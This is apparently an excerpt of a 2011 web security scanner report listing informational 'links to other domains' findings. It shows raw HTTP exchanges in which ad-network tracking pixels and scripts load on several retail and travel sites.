http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/global/DCL_Logo_print.jpg
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/dewey/2.5.1/build/wdpro/wdproloader-utilities/wdproloader-utilities.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/flashUtils.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/search/autoComplete.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/Media/InternetMediaType/CruiseSearchResults/SearchMediaPlayer/DCL-4-Ships.jpg
http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/global/print.css
http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/global/loaderInit.js
http://disneysurveys.com/wix/p0074702.aspx
http://fls.doubleclick.net/activityi;src=2789293;type=dclus637;cat=dclus049;u1=anonymous;u2=Guest;ord=1;num=1?
http://twitter.com/DisneyCruise
http://www.dclnews.com/
http://www.disneycruisenews.com/TopicContentPage.aspx?PageId=1b3591a2-c24f-4052-9382-f1378ecc8c9d
http://www.disneymeetings.com/
http://www.disneytravelagents.com/
http://www.facebook.com/DisneyCruiseLine
http://www.youtube.com/user/DisneyParks

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:41 GMT
Set-Cookie: DCL_POOL=1;path=/;
Set-Cookie: dcl_i_persistence=H+s53hrJN6y2Ah9b0W5d6AFb7O28f0XOK5Gdp5dw9D2ir0p8lxkPl7qrvYGY/z/9JOA=;expires=Mon, 16-May-2011 04:29:16 GMT;path=/;domain=disney.go.com;
Content-Length: 63930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</title>

<link href="http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico" rel="shortcut icon" />
<link rel="canonical" href="http://disneycruise.disney.go.com/reservations/customize" />
<link href="http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/global/core.css,/global/buttons/buttons.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/main.css,/global/debug/debug.css,/global/error/error.css,/global/navigation/navigation.css,/global/categoryList/main.css,/nonGlobal/book/applyPayment.css,/nonGlobal/book/main.css,/nonGlobal/cruiseSearch/cruiseSearch.css,/nonGlobal/customizeCruise/main.css,/nonGlobal/customizeCruise/summary.css,/nonGlobal/searchResults/searchResults.css,/nonGlobal/taLogin/taLogin.css,/../js/dewey/2.5.1/build/yui/menu/assets/skins/sam/menu.css,/../js/dewey/2.5.1/build/yui/tabview/assets/skins/sam/tabview.css,/../js/dewey/2.5.1/build/yui/assets/skins/sam/skin.css,/global/main/sharedMain.css" rel="stylesheet" type="text/css" media="screen, print, handheld" />
<link href="http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/modules/searchAutoComplete.css" rel="stylesheet" type="text/css" media="screen, print, handheld" />

<!--[if lte IE 6]>
...[SNIP]...
</script>
           <script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/dewey/2.5.1/build/wdpro/wdproloader-utilities/wdproloader-utilities.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/dewey/2.5.1/build/yui/selector/selector-beta-min.js,/dewey/2.5.1/build/yui/datasource/datasource-min.js,/dewey/2.5.1/build/yui/container/container-min.js,/dewey/2.5.1/build/yui/menu/menu-min.js,/dewey/2.5.1/build/yui/autocomplete/autocomplete-min.js,/dewey/2.5.1/build/yui/json/json-min.js,/dewey/2.5.1/build/yui/logger/logger-min.js,/dewey/2.5.1/build/yui/tabview/tabview-min.js,/dewey/2.5.1/build/yui/history/history-min.js,/dewey/2.5.1/build/yui/slider/slider-min.js,/global/stringUtils.js,/global/validators.js,/global/formUtils.js,/global/codeRegistry.js,/global/tools.js,/_lib/buttons/buttons.js,/_lib/analytics/analytics.js,/global/effects/effects.js,/global/async/errors.js,/global/async/pollingConnection.js,/global/async/ajaxRequest.js,/global/async/pleaseWait.js,/global/forms/abandonForms.js,/global/forms/formValidator.js,/global/forms/fieldValidations.js,/global/partyMixHandler.js,/global/animation/animation.js,/global/animation/sequencer.js,/global/categoryChangeHandler.js,/global/swfobject.js,/_lib/analytics/omniture/s_code.js,/_lib/tools/testAndTarget/mbox.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/flashUtils.js" type="text/javascript"></script>

<link href="http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/global/print.css" rel="stylesheet" type="text/css" media="print" />
</head>
...[SNIP]...
<div class="grid">

<img height="66" width="505" title="Disney Cruise Lines" alt="Disney Cruise Lines Logo" src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/global/DCL_Logo_print.jpg" id="DCLPrintLogo" class="printOnly" />


        <div id="loginRegForm" class="yui-navset">
...[SNIP]...
<a href="/"><img alt="Disney Cruise Line" height="78" id="GlobalHeaderLogoUIElement" src="http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png" width="306" /></a>
...[SNIP]...
<div id="SearchResults_MediaPlayerSWF_InternetMediaType" class="swfobject"><img alt="Staterooms" height="362" src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/Media/InternetMediaType/CruiseSearchResults/SearchMediaPlayer/DCL-4-Ships.jpg" title="Staterooms" width="644" /></div>
...[SNIP]...
<li><a href="http://disneysurveys.com/wix/p0074702.aspx">Survey: Tell Us What You Think</a>
...[SNIP]...
<li><a href="http://www.disneytravelagents.com">disneytravelagents.com</a>
...[SNIP]...
<li><a href="http://www.disneymeetings.com">Disneymeetings.com</a>
...[SNIP]...
<li><a href="http://www.dclnews.com">Disney Cruise Line News</a>
...[SNIP]...
<li><a href="http://www.disneycruisenews.com/TopicContentPage.aspx?PageId=1b3591a2-c24f-4052-9382-f1378ecc8c9d">Media Contacts</a>
...[SNIP]...
<li><a href="http://aimg.disneystore.com/content/global/recalls/recall_lightupwatch_02092011.pdf"><strong style='color:yellow'>
...[SNIP]...
<li><a href="http://www.facebook.com/DisneyCruiseLine">Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/DisneyCruise">Twitter</a></li>
       <li><a href="http://www.youtube.com/user/DisneyParks">YouTube</a>
...[SNIP]...
</div>
<script src="http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/global/loaderInit.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/nonGlobal/searchResults/searchResults.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
           <iframe src="//fls.doubleclick.net/activityi;src=2789293;type=dclus637;cat=dclus049;u1=anonymous;u2=Guest;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

22.27. http://f.nexac.com/e/a-677/s-2140.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The page was loaded from a URL containing a query string:

http://f.nexac.com/e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=

The response contains the following link to another domain:

http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Credit Application&phint=__bk_k%3d&limit=4

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:20 GMT
Server: lighttpd/1.4.18
Content-Length: 382

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Credit Application&phint=__bk_k%3d&limit=4" height="0" width="0" frameborder="0">
</iframe>
...[SNIP]...

22.28. http://f.nexac.com/e/a-677/s-2140.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The page was loaded from a URL containing a query string:

http://f.nexac.com/e/a-677/s-2140.xgi?na_random=678669980&na_url=http%3A//www.fingerhut.com/&na_referrer=&na_title=Fingerhut%3A%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=Apply%20for%20Credit%2C%20Low%20Monthly%20Payments%2C%20Apparel%2C%20Electronics%2C%20Bed%2C%20Bath%2C%20Toys%2C%20Video%20Games%2C%20MP3%20Players%2C%20Home%20Furnishings

The response contains the following link to another domain:

http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Apply For Credit Get Low Monthly Payments&phint=__bk_k%3dApply for Credit, Low Monthly Payments, Apparel, Electronics, Bed, Bath, Toys, Video Games, MP3 Players, Home Furnishings&limit=4

Request

GET /e/a-677/s-2140.xgi?na_random=678669980&na_url=http%3A//www.fingerhut.com/&na_referrer=&na_title=Fingerhut%3A%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=Apply%20for%20Credit%2C%20Low%20Monthly%20Payments%2C%20Apparel%2C%20Electronics%2C%20Bed%2C%20Bath%2C%20Toys%2C%20Video%20Games%2C%20MP3%20Players%2C%20Home%20Furnishings HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_lr=20110515; na_ps=1; na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:38:46 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:38:46 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:38:46 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:38:46 GMT
Server: lighttpd/1.4.18
Content-Length: 526

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Apply For Credit Get Low Monthly Payments&phint=__bk_k%3dApply for Credit, Low Monthly Payments, Apparel, Electronics, Bed, Bath, Toys, Video Games, MP3 Players, Home Furnishings&limit=4" height="0" width="0" frameborder="0">
</iframe>
...[SNIP]...

22.29. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1774243;type=trave073;cat=trave980;u3=tgdirect;u4=000329;u8=us_direct;u9=Live;ord=1;num=4093222955707.4604?

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=1209577&t=2
https://idcs.interclick.com/Segment.aspx?sid=ebfeaede-d45a-4e04-bc2f-e258bb5571d4
https://secure.media6degrees.com/orbserv/hbpix?pixId=3277
https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing
https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard
https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1022426391/?label=VBLKCKG-wwEQl_rD5wM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0

Request

GET /activityi;src=1774243;type=trave073;cat=trave980;u3=tgdirect;u4=000329;u8=us_direct;u9=Live;ord=1;num=4093222955707.4604? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:44:06 GMT
Expires: Mon, 16 May 2011 01:44:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1893
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://idcs.interclick.com/Segment.aspx?sid=ebfeaede-d45a-4e04-bc2f-e258bb5571d4"/><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0"/><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1022426391/?label=VBLKCKG-wwEQl_rD5wM&guid=ON&script=0"/>
</div>
</noscript><img width="1" height="1" src="https://secure.media6degrees.com/orbserv/hbpix?pixId=3277" /><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" />
<img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

22.30. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=614591941703.111?

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=1209577&t=2
https://pixel.rubiconproject.com/tap.php?v=4112
https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tglb_cs=1&betq=10393=417020
https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing
https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard
https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/1057254703/?label=s2deCJXnSRCv2pH4Aw&guid=ON&script=0

Request

GET /activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=614591941703.111? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:44:06 GMT
Expires: Mon, 16 May 2011 01:44:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2190
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tglb_cs=1&betq=10393=417020" width = "1" height = "1" border = "0"><img src="https://ad.doubleclick.net/activity;src=1857234;dcnet=4845;boom=23858;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1057254703/?label=s2deCJXnSRCv2pH4Aw&guid=ON&script=0"/>
</div>
</noscript>
<img src="https://pixel.rubiconproject.com/tap.php?v=4112" border="0" width="1" height="1"><img src="https://n4403ad.doubleclick.net/ad/gn.bfp_travelguard/iperez_02232010;sect=iperez_02232010;sz=1x7"><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" /><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0"/><img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

22.31. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=51467781?

The response contains the following links to other domains:

https://r.turn.com/r/beacon?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA&cid=
https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA

Request

GET /activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=51467781? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:42:51 GMT
Expires: Mon, 16 May 2011 01:42:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1023
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA">
</script>
<noscript>
<img border="0" src="https://r.turn.com/r/beacon?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA&cid=">
</noscript>
...[SNIP]...

22.32. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3761435560882.0913?

The response contains the following links to other domains:

http://action.mathtag.com/mm/HELZ/red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=1269674253
http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30
http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2
http://ads.adbrite.com/adserver/vdi/684339?d=110
http://ads.bluelithium.com/pixel?id=601754&t=2
http://bp.specificclick.net/?pixid=99002087
http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502
http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1269674253
http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days
http://view.atdmt.com/action/DPM_Helzberg_Homepage
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0
https://ad.yieldmanager.com/pixel?id=628032&t=2

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3761435560882.0913? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:40:47 GMT
